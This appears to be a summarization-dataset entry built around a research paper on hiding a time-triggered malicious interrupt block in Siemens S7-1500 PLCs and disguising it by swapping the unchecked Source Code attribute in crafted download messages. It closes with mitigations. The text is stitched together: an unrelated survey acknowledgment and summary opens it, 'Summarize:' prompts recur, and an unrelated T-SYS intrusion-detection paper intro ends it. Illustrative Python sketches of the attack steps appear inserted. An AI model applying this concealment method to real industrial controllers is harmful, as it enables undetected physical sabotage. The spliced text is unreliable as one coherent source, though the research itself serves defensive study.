The authors from New York University (NYU) would like to thank S. Lee, P. Robison, P. Stergiou, and S. Kim from Consolidated Edison for their continuous support on the project, Platform Profiling in Legacy and Modern Control and Monitoring Systems.
Summary:
|Industrial control systems (ICSs) are transitioning from legacy-electromechanical-based systems to modern information and communication technology (ICT)-based systems, creating a close coupling between cyber and physical components. In this paper, we explore the ICS cybersecurity landscape including: 1) the key principles and unique aspects of ICS operation; 2) a brief history of cyberattacks on ICS; 3) an overview of ICS security assessment; 4) a survey of uniquely-ICS testbeds that capture the interactions between the various layers of an ICS; and 5) current trends in ICS attacks and defenses.
|
Summarize:
Index Terms PLCs, ICSs, Cyber Attacks, Cyber-Physical Systems Security

I. INTRODUCTION

Attackers target the control logic program to compromise exposed Programmable Logic Controllers (PLCs), aiming at sabotaging the control processes driven by the victim industrial devices. Such a threat is known, in the industrial community, as control logic injection, or control logic modification. It involves manipulating the original user-program that the PLC is programmed with, typically by employing a man-in-the-middle (MITM) approach as reported in [2], [3], [7]-[9], [11], [19]-[21], [31], [32], [36]. The main vulnerability that attackers exploit in this attack is the lack of integrity algorithms in PLC protocols. As a response to this threat, most ICS vendors recommended that engineers and ICS operators set passwords to prevent unauthorized access from malicious adversaries. In other words, when a user tries to gain access to the program running in a PLC, the PLC first checks whether the user is authenticated by initiating a so-called authentication protocol. If the authentication process succeeds, it allows the user to read/write the program using a proprietary communication protocol. However, this solution could not sufficiently secure PLCs from unauthorized access, as previous academic efforts [1]-[3], [7], [22], [36] presented successful bypass attacks on the authentication methods used in PLCs from different vendors. Consequently, protecting control logic programs with passwords alone failed to prevent attackers from accessing PLCs and manipulating their programs.
The existing control logic injection attacks in the research community face two major challenges. First, a classic injection attack is normally designed to gain access to PLCs in certain circumstances [2]-[9], [15], [20], [21], [31], [36], e.g., when the applied security means are absent or disabled for a specific reason, such as ongoing maintenance processes, hardware components being added to or removed from the control network, security means being updated, etc. Although PLCs during those critical times have a high chance of unauthorized infection, they are not running in their normal states, i.e., the physical processes are more likely to be temporarily off. Thus, if an adversary gains access to the victim PLC during those times and conducts his attack right afterwards, he will quite likely not succeed in impacting the physical process. Second, once the ICS operator is done with any maintenance process, he normally re-activates the security means before operating the system once again. This procedure allows him to detect any infection in the PLC. Our approach introduced in this paper overcomes the above-mentioned challenges by inserting certain malicious instructions in an interrupt block, and then patching the target PLC with the block once the attacker manages to access the control network successfully. The infection remains invisible in the PLC's memory, and will only be activated at a later time that the adversary sets. This ensures that the patch is neither triggered in case the system is not running normally, nor revealed by the implemented security means. The prime focus of this paper is on SIMATIC S7 PLCs provided by Siemens. This is because Siemens leads the industrial automation market [33]-[35], and its SIMATIC families hold approximately 30-40% of the entire industry market. Our experiments involve the newest PLC line, i.e., the S7-1500, and its respective engineering software, i.e.,
the Totally Integrated Automation (TIA) Portal software. The motivation behind this work is that Siemens reportedly claimed that its S7-1500 PLCs are well secured against various attacks, and that the S7CommPlus protocol developed for such devices has improved anti-replay and integrity check mechanisms. For implementing a real-world attack, a Fischertechnik industry model controlled by a CPU S7-1512SP was used.

2022 XXVIII International Conference on Information, Communication and Automation Technologies (ICAT) | 978-1-6654-6692-9/22/$31.00 2022 IEEE | DOI: 10.1109/ICAT54566.2022.9811147
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:38:29 UTC from IEEE Xplore. Restrictions apply.

A. Assumptions

To conduct a real-world attack scenario, like TRITON [12] and the Ukraine power grid attack [13], we suppose that an adversary already has access to the control network, knowing that attackers can gain such access via a typical IT attack, e.g., an infected USB stick, or a typical social engineering attack, e.g., a phishing attack. To make our attack more challenging, we also assume that the adversary has no access to the engineering software, and can only record the network traffic between the PLC and the engineering software using a packet-sniffing tool such as Wireshark1.

B. Attacker's goal

The attacker aims at confusing the control logic of a victim PLC at a time when he is disconnected from the target and its network, i.e., he is completely offline at the point zero of the attack. Furthermore, the infection must remain concealed as long as the interrupt condition is not met, i.e., until the very moment determined by the attacker. In other words, the infection must not be revealed in the time between infecting the PLC and the attack launch date.

C. Attack Scenario

In this paper, we conduct the attack approach presented in figure 1.
Taking into consideration the assumptions mentioned earlier, our attack consists of two main phases (Fig. 1: Attack Scenario):

1) Infecting the PLC: in this phase, the attacker patches the control logic program with a malicious block, precisely with the interrupt Time-of-Day (ToD) block, using Organization Block 10 (OB10). This phase functions online, i.e., when the attacker has access to the target PLC. Please note that throughout this phase, the infection is hidden and set to idle mode to meet the attacker's second goal.

2) Triggering the infection: the attacker triggers the malicious block at a date and time of his choosing. This phase functions offline, i.e., without the need to be connected to the PLC/network at the point zero of the attack.

The rest of this work is organized as follows. Section II provides related works. Section III presents an overview of the latest S7CommPlus protocol version. In Section IV, our experimental setup is shown, followed by the description of our attack approach in Section V. Section VI assesses and discusses the impact of our attack, and then suggests some possible mitigation methods against such a threat. Finally, we conclude our work in Section VII.

1 https://www.wireshark.org/

II. RELATED WORK

The best-known attack representing a typical control logic injection attack is the one that targeted the Iranian nuclear facility in 2010, namely Stuxnet [10]. More recent real-world attacks occurred in Ukraine [13], [15], and in Germany [17]. However, in the following, we overview the recent related academic works. In 2015, Klick et al. [4] introduced a malicious injection into the program running in a SIMATIC PLC, without confusing the execution process of the user-program. In a follow-up work, Spenneberg et al. [5] published a PLC worm. The infection approach presented in their work spreads internally from one PLC to another.
A Ladder Logic Bomb malware, written in ladder logic or one of the high-level programming languages, was introduced in [6]. This malware was injected by an adversary into a control logic program running in an exposed PLC. In 2021, researchers in [2] showed that S7-300 PLCs are vulnerable to control modification attacks and demonstrated that confusing a physical process controlled by an infected PLC is feasible. After compromising the security measures, the authors conducted an injection attack and successfully managed to keep their infection hidden from the engineering software. Their concealment approach is based on engaging a fake PLC impersonating a real uninfected PLC. The authors of [31] overcame the anti-replay mechanism used in the newer S7 PLC models, and showed that a skilled adversary could craft valid captured packets to make malicious changes to the control logic program. The authors of Rogue7 [19] introduced a rogue engineering station that can pose as the engineering software to the PLC and inject any malicious code the attacker wishes. By understanding how cryptographic messages were transferred between the parties, they hid their infection in the PLC's memory. All those attacks were quite limited, and required adversaries to be connected to the PLC at the point zero of the attack. Thus, the possibility of being detected by the ICS operators or the implemented security means is high. To overcome the limitations of the previous works, we introduced a novel attack approach based on injecting PLCs with an interrupt code, precisely with a Time-of-Day block [8]. The malicious block used in our attack aims at interrupting the execution process of the program at a certain time the attacker sets. Our experimental results proved the concept that an adversary could manipulate the control process even when not connected to the target PLC.
Despite the fact that our attack approach was only conducted on an S7-300 PLC and designed to force the PLC to switch off, the attack was efficient and could confuse the execution sequence of the program running in the victim PLC. Such attacks are quite severe, as infected PLCs keep executing the original program appropriately, i.e., without being confused/interrupted, for hours, days, weeks, months and even years, before the very moment at which the adversary wants his attack to trigger. However, the only realistic way to reveal our approach was when the ICS supervisor requested the control logic from the PLC and compared the online and offline codes running in the infected device and the engineering station, respectively. We overcome this challenge as shown later.

III. S7COMMPLUSV3 PROTOCOL

The latest S7 protocol version, namely S7CommPlusV3 [18], is utilized in the newer versions of the Totally Integrated Automation (TIA) Portal, i.e., from V13 on, and also in the newer CPU S7-1500 firmware, e.g., V1.8, V2.0, etc. The newest S7 protocol was developed to involve a sophisticated integrity method and is considered the most secure protocol compared to the prior versions, e.g., S7CommPlusV1 and S7CommPlusV2. It provides various operations, e.g., Start, Stop, Download, Upload, etc., that are first translated to S7CommPlus messages by the TIA Portal, and then transmitted to the PLC. Figure 2 shows the structure of a regular S7CommPlusV3 message (Fig. 2: The structure of an S7CommPlusV3 message). After the PLC receives the messages, it acts by executing the control operations required by the user, and then responds back to the engineering software accordingly. These messages are transferred in sessions, each of which has a unique ID chosen by the PLC.
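As a hedged illustration of the session mechanism just described (request/response exchanges bound to a PLC-chosen session ID), the following Python sketch models it. The class and field names are our own assumptions for illustration, not the real protocol layout, and the sketch omits the handshake, key exchange, and integrity protection that the real protocol performs.

```python
import secrets

class ToyPLCSession:
    """Toy model of an S7CommPlus-style session: the PLC chooses a
    unique session ID, and every later request must carry that ID to
    be accepted. Purely illustrative."""

    def __init__(self):
        self.session_id = secrets.randbits(32)  # chosen by the PLC side

    def handle(self, request: dict) -> dict:
        # Reject requests that do not belong to this session.
        if request.get("session_id") != self.session_id:
            return {"ok": False, "error": "session ID mismatch"}
        # 0x31 is the download function code mentioned in the text.
        return {"ok": True, "function": request["function"]}

plc = ToyPLCSession()
good = plc.handle({"session_id": plc.session_id, "function": 0x31})
bad = plc.handle({"session_id": plc.session_id + 1, "function": 0x31})
```

In this toy model, a replayed request from an earlier session carries a stale session ID and is rejected, which mirrors why the attack described later must splice attributes into a message belonging to the current session.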
Figure 3 depicts the packet order in a communication session via the S7CommPlusV3 protocol. As shown, each session begins with a handshake comprised of four messages. The cryptographic attributes, as well as the protocol version and keys, are selected over those four messages. After a successful handshake, all packets are integrity-protected utilizing a very sophisticated cryptographic protection mechanism. Please note that explaining the encryption process, or extracting the encrypted keys used in this protocol, is out of the scope of this paper. However, [16], [19], [32] provide sufficient technical information about the integrity protection method that the newest version of the S7 protocol uses. The S7CommPlus protocol functions in a request-response manner, meaning that each request packet contains a request header and a request set. The header involves a function code that identifies the required operation, e.g., 0x31 for a download message as shown in figure 4 (Fig. 3: Messages exchanged in an S7 session via S7CommPlusV3; Fig. 4: S7CommPlus Download Request - Objects and Attributes). Furthermore, each message contains multiple objects that are comprised of attributes. All the objects as well as the attributes are identified using unique class identifiers. For instance, the CreateObject request, sent by the engineering software to the PLC over an S7CommPlus download message, builds a new object in the PLC memory with a unique ID (in our given example, 0x04ca). The download packet therefore generates an object of class ProgramCycleOB. This created object is comprised of multiple attributes, each with specific values dedicated to a certain aim, as follows [32]:

- Object MAC: denoted with the item value ID Block.AdditionalMac and used as an additional Message Authentication Code (MAC) value in the encryption integrity process.
- Object Code: denoted with the item value ID FunctionalObject.code. It is the binary executable code that the PLC reads and processes.
- Source Code: denoted with the item value ID Block.BodyDescription. It is equivalent to the program written by the ICS operator, which is stored in the PLC and can later be uploaded, upon request, to a TIA Portal project.

IV. EXPERIMENTAL SET-UP

To test the approach presented in this paper, we used a Fischertechnik training factory2 as seen in figure 5 (Fig. 5: Experimental Set-up). Please note that this setup was already used in experiments run earlier, i.e., the following description is very similar to the one in our former publication [32]. The factory is comprised of five industrial modules: vacuum suction gripper (VGR), high-bay warehouse (HBW), multi-processing station with kiln (MPO), sorting line with color recognition (SLD), and environment station with surveillance camera (SSC). The entire system is controlled by a SIMATIC S7-1512SP with firmware V2.9.2, and programmed by TIA Portal V16. The PLC connects to a TXT controller3 via an IoT gateway. The TXT controller serves as a Message Queuing Telemetry Transport (MQTT) broker and an interface to the fischertechnik cloud.

2 https://www.fischertechnikwebshop.com/de-DE/fischertechnik-lernfabrik-4-0-24v-komplettset-mit-sps-s7-1500-560840-de-de
3 https://www.fischertechnik.de/en/service/elearning/playing/txt-controller

The factory we used in our experiments provides two industrial processes: storing and ordering materials. The default process cycle begins with storing and identifying the material, i.e., the workpiece. The factory has an integrated NFC tag sensor storing production data that can be read out via an RFID NFC module. This allows the user to trace the workpieces digitally. The cloud displays the part's colour and its ID number.
Afterwards, the vacuum gripper applies suction to the material and transports it to the high-bay warehouse, which applies a first-in first-out principle for outsourcing. All goods that were stored can be ordered again online using a dashboard. The desired product and the corresponding color are selected by the user, and then placed in the shopping cart. The suction gripper passes the workpiece on from one step to the next, and then moves back to the sorting system once the production is complete. The sorting system receives the allocation command as soon as the color sorter detects the proper color. The material is sorted using pneumatic cylinders. Finally, the production data is written to the material at the end of the production process, and the finished product is provided for collection.

V. ATTACK DESCRIPTION

Our approach introduced in this work consists of two phases: infecting the PLC (online phase), and triggering the interrupt block (offline phase). Please note that obtaining the IP and MAC address, as well as the model of the victim PLC, is out of the scope of this paper, and can be achieved by applying a PN-DCP protocol based scanner [36], an S7CommPlus scanner [37], or any other network scanner. In the next two subsections, we illustrate our attack approach in detail.

A. Infecting the PLC (Online Phase)

Here, we aim at patching the victim with malicious commands inserted in OB10. For this purpose, we utilize a developed man-in-the-middle (MITM) station that contains two components:
- TIA Portal software: to retrieve and modify the actual program that the victim device runs.
- PLCinjector tool: to patch the PLC with the adversary's malicious code.

Our infecting phase is comprised of four steps as follows: 1) reading and writing the user-program; 2) altering and updating the user-program; 3) concealing the malicious infection; 4) transferring the crafted S7 messages.
1) Reading & writing the user-program: After gaining access to the control network, we need to steal the user-program that the victim device is programmed with. Figure 6 describes this step (Fig. 6: Upload, download, and record the user-program). As seen, we launch the attacker's TIA Portal and establish a connection with the target PLC directly. Due to a security gap in the design of the newest S7 PLCs, i.e., the S7-1500 series, we were able to communicate with the victim device using an unauthorized TIA Portal software. For a better understanding: the S7-1500 PLC does not implement any security mechanisms or checking procedures to ensure that the presently connected TIA Portal software is the same one that the PLC communicated with in a previous communication session [32]. This vulnerability allows any adversary with a TIA Portal software installed on his machine to easily communicate with S7 PLCs without any effort. After the communication is successfully established, we retrieve the user-program to the attacker's TIA Portal software by sending an upload command. Afterwards, we download it again to the target and record the entire S7CommPlus packet flow transmitted between the attacker's machine and the victim PLC utilizing the Wireshark software. Eventually, the adversary has the user-program on his own TIA Portal software, and all the captured messages dedicated to the download command are saved in a Pcap file for further use in the next steps.

2) Altering & updating the user-program: After we retrieve the user-program, the unauthorized TIA Portal displays it in the high-level programming language that it was originally programmed with (e.g., Structured Control Language, SCL).
By understanding the control process driven by the victim PLC, we can configure malicious instructions that manipulate certain outputs or inputs in the target system, e.g., we can force a certain output to turn off when the interrupt block is triggered. This is done as follows. We add to the current user-program a new OB with the specific event class Time-of-Day, and then enter the name of the block, the desired programming language (e.g., SCL), and the number of the assigned organization block, i.e., 10. After that, we program the block with the attacker's commands to be executed when the interrupt occurs. [30] provides all the technical details to configure and program Time-of-Day interrupts in S7-1500 PLCs. In spite of the fact that our malicious code differs by only one extra small block (OB10) from the original one, it is sufficient to disturb the control process of our experimental set-up, as shown in the next section. The easiest way to infect the PLC is to write the modified program directly to the PLC using the attacker's TIA Portal. This allows the attacker to transfer his program (the original code with the new interrupt block OB10) into the victim PLC without any effort. After the PLC receives the attacker's program, it updates its program successfully without knowing that it is connected to a non-authorized TIA Portal.

3) Concealing the malicious infection: Downloading the attacker's program into the PLC using the attacker's TIA Portal has a challenge. The legitimate user can easily disclose the infection by requesting the control logic from the patched device, and comparing the offline program that is saved on the legitimate engineering station, i.e., the TIA Portal, with the online program running on the remote PLC (similar to how the infection in [8] was revealed). To overcome this challenge, we need to conceal the infection from the ICS operator by transferring the attacker's code over a crafted S7CommPlus download message.
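The altering step above (adding a Time-of-Day OB10 to the retrieved user-program) can be sketched in Python. This is a minimal model that represents the user-program as a dictionary of organization blocks; the field names are hypothetical and do not reflect the real TIA Portal project format.

```python
def add_tod_interrupt(program: dict, trigger: str, body: str) -> dict:
    """Return a copy of the user-program patched with a Time-of-Day
    interrupt block (OB10). The original blocks are left untouched;
    only one small extra block is added, mirroring the observation
    that the patched program differs from the original by a single
    interrupt block."""
    patched = dict(program)
    patched["OB10"] = {
        "event_class": "Time-of-Day",  # interrupt event class
        "language": "SCL",             # programming language of the block
        "trigger": trigger,            # attacker-chosen date/time
        "body": body,                  # attacker's commands
    }
    return patched

# Hypothetical original program: one program-cycle block.
original = {"OB1": {"event_class": "Program cycle", "body": "user logic"}}
patched = add_tod_interrupt(original, "2022-05-01T12:00", "switch outputs off")
```

Because the trigger condition lives entirely inside the added block, the patched program behaves identically to the original until the configured date and time are reached.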
Siemens provides its S7-1500 PLCs with a precaution procedure that double-checks each session's freshness. Thus, it can reveal a potential manipulation and refuses to update its program in case the attributes of the ProgramCycleOB object do not have the same session ID, i.e., do not belong to the same session. This procedure is part of a very complex anti-replay mechanism that Siemens uses to protect its newest PLC line from replay attacks. However, our observations showed that the PLC does not check the integrity of all the attributes transferred over the S7CommPlus protocol as expected. That is, the PLC checks only specific integrity bytes that only Object MAC and Object Code contain in their bytecodes, whilst the Source Code does not have those integrity bytes, or any other bytes dedicated to security purposes. Consequently, we can conclude that the Source Code attribute is not integrity-checked by the PLC, and attackers could maliciously replace this attribute with another one from an already pre-recorded S7CommPlus message. Thus, using Scapy4, we can craft the attacker's S7CommPlus download message by substituting the Source Code attribute of the ProgramCycleOB object of the malicious program with the Source Code attribute of the ProgramCycleOB object of the original user-program. Figure 7 depicts this method (Fig. 7: Crafting the S7CommPlus download message). In such a scenario, whenever the ICS supervisor requests the control logic from the infected PLC, it will respond by sending the ProgramCycleOB object stored in its memory. The TIA Portal then decompiles the Source Code attribute, which eventually represents the original user-program, not the attacker's program. This method deceives the ICS operator by always showing him the original user-program, whilst the PLC executes a different one.

4 Scapy (https://scapy.net/) is a powerful packet manipulation program written in Python. It features a variety of packet manipulation capabilities including sniffing and replaying packets in the network, network scanning, tracerouting, etc.

4) Transferring the crafted S7 message: Our crafted download packet comprises the following attributes: the Object MAC and Object Code attributes of the malicious program, and the Source Code attribute of the user-program. To push the message into the target PLC, we used our developed PLCinjector tool published in [32]. The tool is dedicated to injecting S7-1500 PLCs and has two functions. The first function is employed to compromise the two integrity protection modules that S7CommPlusV3 utilizes, i.e., the pre-fragment message protection and the session key exchange protocol. The second function is based on Scapy, and is used to send the adversary's download packet to the PLC after the proper modifications to the session ID and certain integrity fields of the S7 message are done. It is worth mentioning that our PLCinjector tool can also be used on all S7-1500 PLCs sharing the same firmware, as Siemens has designed the new S7 key exchange mechanism with the strong assumption that all PLCs with the same firmware version also utilize the same public-private key mechanism [19].

B. Triggering phase (Offline)

After we inject our malicious program into the target PLC, we go offline and close the current live session with the victim and its network. The malicious program will be executed with the next execution cycle, and the CPU checks the interrupt condition in each execution cycle. Our patch remains in idle mode, unobserved in the PLC's memory, until the interrupt condition is met, i.e., once the attack date the attacker set matches the date of the CPU, the interrupt is triggered, and the malicious instructions in block OB10 are then processed.
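The concealment step (carrying the malicious Object MAC and Object Code while retaining the original, non-integrity-checked Source Code attribute) can be sketched as follows. The dictionary layout is a deliberate simplification of the ProgramCycleOB object; the real crafting is performed over S7CommPlus packets with Scapy, which this sketch does not attempt to reproduce.

```python
def craft_download(malicious: dict, original: dict) -> dict:
    """Model of the attribute swap described in the text: keep the
    attacker's integrity-checked attributes (Object MAC, Object Code),
    but substitute the original program's Source Code attribute, so a
    later upload decompiles to the benign source while the PLC runs
    the malicious binary."""
    crafted = dict(malicious)
    crafted["source_code"] = original["source_code"]
    return crafted

# Hypothetical attribute values for illustration only.
malicious = {"object_mac": b"\x11\x22", "object_code": b"OB1+OB10 binary",
             "source_code": b"malicious SCL source"}
original = {"object_mac": b"\x33\x44", "object_code": b"OB1 binary",
            "source_code": b"benign SCL source"}
crafted = craft_download(malicious, original)
```

The design point this illustrates is that the deception works only because the PLC validates object_mac and object_code but never cross-checks source_code against the executable it actually runs.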
In our experimental setup, we programmed the OB10 to force particular motors to switch off at a specific time and date when we are disconnected from the control network.

VI. RESULTS, EVALUATION, AND MITIGATION

In this section, we show the results of implementing the attack scenario presented in the former section, and evaluate the service disruption of the control process due to our patch. After that, we discuss our experimental results and suggest some possible mitigation methods to protect our industrial systems from such a serious attack.

A. Results

For achieving convincing results, we conducted five attack scenarios on the industrial modules of our Fischertechnik factory. In the following, we explain only one scenario in detail, as the other scenarios are performed in the same way. The first attack scenario aims at confusing the VGR module. This module operates using 8 motors as follows: vertical motor up (%Q2.0), vertical motor down (%Q2.1), horizontal motor backwards (%Q2.2), horizontal motor forwards (%Q2.3), turn motor clockwise (%Q2.4), turn motor anti-clockwise (%Q2.5), compressor (%Q2.6), and valve vacuum (%Q2.7). Those 8 motors (PLC outputs) are assigned to specific parameters in a data block, namely QX_VGR, and used in the control logic program as: QX_VGR_M1_VerticalAaxisUp_Q1, QX_VGR_M1_VerticalAaxisDown_Q2, QX_VGR_M2_HorizontalAxisBackward_Q3, QX_VGR_M2_HorizontalAxisForward_Q4, QX_VGR_M3_RotateClockWise_Q5, QX_VGR_M3_RotateCounterclockwise_Q6, QX_VGR_Compressor_Q7, QX_VGR_ValveVacuum_Q8, respectively. For confusing the VGR module, we inserted our OB10 with specific commands to switch all 8 motors off at the point zero of the attack. Afterwards, we patched the PLC following the four steps explained in Section V. Our results showed that we successfully managed to update the PLC's program without recording any physical impact in the time between patching the PLC and the very determined moment of attack, i.e.,
the workpiece keeps moving normally between the industrial modules. Once the clock of the victim CPU matched the time and date that we had configured, we observed that the VGR module stopped moving. Moreover, the workpiece being shipped by the gripper fell down. This is due to the fact that the compressor that provides the appropriate air flow to transport the good was switched off. This led to an inappropriate operation, and the movement sequence of the workpieces was successfully confused. In a real-world plant, e.g., the automobile manufacturing industry, such a disturbance might be significantly catastrophic and might even cost human lives. We extracted the outputs linked to the PLC in the same way for the other modules, i.e., HBW, MPO, SLD, and SSC, and then programmed the interrupt block OB10 to force the corresponding outputs to switch off when the interrupt block is activated. Our results showed that the PLC always updates its program, and we could successfully keep the interrupt block for each infection in idle mode until the very moment determined by us.

B. Evaluation

Siemens PLCs, by default, store the time of the last execution cycle in a local variable of OB1 called OB1_PREV_CYCLE [8]. Therefore, to evaluate the resulting disturbance of our patches on the control process accurately, we added a small SCL code snippet to our user-program that stores the last cycle time in a separate data block. Afterwards, we recorded as many as 4096 execution cycles for each scenario, calculated the arithmetic mean value, and eventually used the Kruskal-Wallis and Dunn's multiple comparison tests for statistical analysis. All our experimental results are shown in figure 8 (Fig. 8: Boxplot presenting the measured execution cycle times of OB1 for five attack scenarios).
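The statistical comparison just described can be reproduced in outline. The sketch below computes the Kruskal-Wallis H statistic in pure Python (using mean ranks for ties, without the tie-correction factor, and omitting Dunn's post-hoc test); the cycle-time values at the bottom are made up for illustration and are not the paper's measurements.

```python
def kruskal_h(*groups):
    """Kruskal-Wallis H statistic over several samples: rank all
    observations jointly (mean ranks for tied values), then compare
    the per-group rank sums."""
    data = sorted((v, g) for g, grp in enumerate(groups) for v in grp)
    n = len(data)
    rank_sums = [0.0] * len(groups)
    i = 0
    while i < n:
        j = i
        while j < n and data[j][0] == data[i][0]:
            j += 1  # extend over a run of tied values
        mean_rank = (i + 1 + j) / 2.0  # mean of 1-based ranks i+1 .. j
        for k in range(i, j):
            rank_sums[data[k][1]] += mean_rank
        i = j
    h = sum(rank_sums[g] ** 2 / len(grp) for g, grp in enumerate(groups))
    return 12.0 / (n * (n + 1)) * h - 3.0 * (n + 1)

# Hypothetical OB1 cycle times (ms) for a baseline vs. one infection.
baseline = [36, 35, 37, 36, 36]
infected = [38, 39, 37, 38, 40]
H = kruskal_h(baseline, infected)
```

A large H (compared against a chi-squared threshold) indicates that at least one scenario's cycle-time distribution differs; a post-hoc test such as Dunn's would then identify which pairs differ.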
Our results show that the mean value of executing OB1 for the first infection (i.e., attacking the VGR module) is approx. 38 milliseconds (ms), and differs slightly from the mean value of executing OB1 for the original user-program (baseline), which is almost 36 ms. The execution cycle time when we attacked the HBW module also rose slightly; we recorded a mean value as high as 37 ms. Our patch dedicated to attacking the MPO module introduced a mean cycle time as high as 40 ms, whilst the highest value that our experiments recorded was when we patched the control logic with an OB10 dedicated to confusing the SLD module; we noticed that the mean value rose to 46 ms. Patching the control logic with an OB10 to disrupt the functionality of the SSC module did not record a noticeable difference in executing OB1, where the mean value that we registered was 37 ms. From all this, we can conclude that checking the interrupt condition of our malicious block (OB10) in each execution cycle does not impact the execution process of the PLC's program, and the Fischertechnik system keeps operating normally. In order to conceal our infection successfully, we need to take into consideration that executing the malicious program should not exceed the overall maximum execution time of 150 ms [8]. However, all our infections are unlikely to trigger this timeout, as they are quite small compared to 150 ms. Furthermore, the sizes of the OB10 blocks used in our infections were quite small (between roughly 6 and 9 KB). Therefore, our attack approach will most likely not exceed the free available space in the PLC's memory to store the extra malicious block that the attacker patches.

C. Mitigation

An appropriate recommendation we keenly suggest is to fix the integrity mechanism issues in the S7-1500 PLCs that our investigations found. The new improved mechanism must include two-way group authentication between PLCs and the TIA Portal software.
On the other hand, we also understand that such a fundamental solution needs a while to be implemented, as it requires a high cost and may have side effects. Moreover, industrial components have a longer life cycle than common IT devices. Thus, we believe that PLCs may not be updated on time. As a result, exposed devices will still operate in real-world industrial environments. In this regard, a proper immediate solution could be integrating network detection into the existing ICS settings. For instance, control logic detection [23] and verification [28], [29] can be employed to alleviate the current situation. As our infections were concealed inside the PLC, precisely in the memory, partitioning the memory space and enforcing memory access control [24] could also be a convenient solution. Other solutions would be implementing a digital signature for control messages such as control logic manipulation, network monitoring tools like SNORT [25], ArpAlert [26], and ArpWatchNG [27] for disclosing any threat involving a MITM approach, and a security mechanism to scan and double-check the protocol header that contains critical data about the type of the payload. All those suggestions are recommended to detect and block any potential unauthorized transmission of the control logic.

VII. CONCLUSION

This paper extended our attack approach introduced in [8] to involve the newest SIMATIC PLC line. Based on the design vulnerabilities in S7-1500 PLCs, we performed a sophisticated injection attack scenario that infects an exposed PLC with a Time-of-Day block (OB10). The malicious interrupt block allows attackers to trigger the patch at a certain time and date, and eventually to disturb the industrial process without being connected to either the PLC or its network at the point zero of the attack.
Our investigations proved the concept that the original control logic program is always displayed on the legitimate TIA Portal, whilst the infected PLC runs another program. On the other hand, our malicious program does not exceed the overall maximum execution time of 150 ms. Hence, the industrial process is not interrupted/disturbed while the patch is in idle mode. For all that, the malicious infection will not be detected even if the ICS supervisor re-activates the security means before re-operating the system. Finally, we provided some possible security recommendations to secure our ICS environments from such a severe threat.
Summary:
In this paper, we take the attack approach introduced in our previous work [8] one more step in the direction of exploiting PLCs offline, and extend our experiments to cover the latest and most secure Siemens PLC line, i.e., S7-1500 CPUs. The attack scenario conducted in this work aims at confusing the behavior of the target system when malicious attackers are connected neither to the victim system nor to its control network at the very moment of the attack. The new approach presented in this paper is comprised of two stages. First, an attacker patches the PLC with a specific interrupt block, Time-of-Day, once he successfully manages to access/compromise an exposed PLC. Then he triggers the block at a later time of his choosing, when he is completely offline, i.e., disconnected from the control network. For a real-world implementation, we tested our approach on a Fischertechnik system using an S7-1500 CPU that supports the newest version of the S7CommPlus protocol, i.e., S7CommPlusV3. Our experimental results showed that we could infect the target PLC successfully and conceal our malicious interrupt block in the PLC memory until the very moment we had determined. This makes our attack stealthy, as the engineering station cannot detect that the PLC got infected. Finally, we presented security and mitigation methods to prevent such a threat.
|
Summarize:
KEYWORDS Real-time systems, security, worst-case execution time

1 INTRODUCTION
Simple networked and embedded devices have become increasingly common throughout a wide range of applications as processors with the necessary capabilities have become cheaper and more plentiful. Increasingly, such systems are incorporated into critical infrastructure (ranging from a single traffic light to a municipal power grid) and autonomous vehicles, i.e., systems subject to hard real-time constraints. Failing to control such systems can result in loss of life or severe environmental damage. Meanwhile, cyber attacks have become widespread and are penetrating embedded systems as they are increasingly networked. Hence, it is becoming crucial to protect such cyber-physical systems (CPS) from attacks [7]. However, securing embedded, time-constrained systems presents a number of unique challenges beyond those of securing commodity compute systems [11]. Ordinary methods of protection, particularly kernel-level protection, are insufficient by themselves in embedded and real-time systems, since they focus on system functionality and tend to add significant execution overhead, yet lack the ability to ensure that a system operates within its timing constraints. In addition, some proposed protection methods are dependent on hypothetical specialized hardware [10], or require significant developer effort to configure protection based on known threats and system performance requirements. To fill this gap, methods need to be developed for implementing kernel-level protection into the RTOS, as well as allowing for easy configuration based on elastic timing bounds. Real-time systems require accurate timing information and predictable behavior with regard to execution time. This predictability can be leveraged to detect attacks by identifying timing irregularities. Such irregularities are indicative of system malfunction due to a cyber attack or excessive execution beyond specified WCET bounds of a task or code region. We assume the former hereafter.
This work contributes T-SYS, a monitoring method for intrusion detection that relies on inserting time checks (instrumentation points) along code paths with known WCET bounds. A compiler-based tool to allow the automatic integration of T-SYS protection based on a user-defined Maximum Vulnerability Threshold is developed as well. This allows T-SYS to be configured, at compile time, according to expected threats, security requirements, or system performance. When T-SYS is implemented in both kernel- and user-level code, it is capable of providing end-to-end protection across the entire execution path. Its instrumentation complements other conventional security techniques by integrating WCET monitoring points along execution paths into code. Any intrusions resulting in execution time exceeding the WCET budget between two instrumentation points will be detected, which limits the code of such injections in length to a so-called window of vulnerability correlated to the longest WCET path between instrumentation points. The Maximum Vulnerability Threshold defines the upper bound of this window of vulnerability, which will be tolerated by the compiler-based integration tool, and is determined by the user. A number of WCET-based protection methods have been proposed [10, 34, 35]. We compare T-SYS to Bellec et al. [10], as they developed an algorithm to identify regions, for each of which timing is tracked in order to identify intrusion by detecting anomalies. However, the criteria used to divide code into regions, as well as the requirements for region structure, are vastly different. Where the Bellec algorithm utilizes single-entry/single-exit nested regions, T-SYS allows for multi-exit regions; Bellec creates a hierarchy of nested regions requiring stack maintenance of timed context data, while T-SYS requires neither nested regions nor a region stack. What's more, T-SYS supports elastic timing requirements determined prior to compile time, facilitated by our ROSE compiler tool for placing instrumentation points.
This elasticity allows the user to choose a desired level of protection based on application requirements instead of Bellec's rigid one-sized regions determined by control-flow shape. We also develop transformations to loop structures to further reduce overhead. Bellec relies on a hardware monitor to track the cycle count within a program, and thereby detect timing anomalies with zero performance overhead. With a similar hardware design, T-SYS overhead could also be reduced to zero. A further description of the requirements for T-SYS hardware is given in Section 4.

[2022 ACM/IEEE 13th International Conference on Cyber-Physical Systems (ICCPS), 978-1-6654-0967-4/22/$31.00 2022 IEEE, DOI: 10.1109/ICCPS54341.2022.00029]

However, as such hardware does not exist in practice, experiments in this paper were conducted using software implementations of both T-SYS and Bellec's methods, assessing overheads for instrumentation points. This also provides an indication of cost for a realistic deployment of such intrusion protection. The primary contributions of this work are:
- T-SYS is developed, a novel method for timing-based protection across user and kernel boundaries.
- A compiler-based tool for automatic integration of elastic T-SYS instrumentation points is algorithmically developed.
- A prototype implementation of T-SYS is realized in an existing Autosar/OSEK-compliant RTOS, as well as in a variety of existing real-world CPS benchmark task sets.
